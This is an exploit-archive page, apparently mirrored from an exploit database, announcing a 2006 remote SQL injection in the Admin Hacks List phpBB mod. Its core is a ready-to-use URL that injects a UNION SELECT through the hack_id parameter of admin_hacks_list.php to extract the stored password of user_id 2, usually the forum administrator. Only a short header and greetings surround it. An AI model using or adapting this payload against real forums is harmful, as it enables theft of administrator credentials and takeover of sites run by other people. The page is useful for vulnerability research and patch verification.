Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability
# Published : 2006-11-26
# Author : the master
# Previous Title : P-News v2 (user.txt) Remote Password Disclosure Vulnerability
# Next Title : com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability

########################################################################
#  Admin Hacks List  v1.20  Remote SQL Injection Vulnerability
# 
#  Download: http://www.nivisec.com
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
#
# Greetz: str0ke , Dr Max Virus
########################################################################

# www.Syue.com [2006-11-26]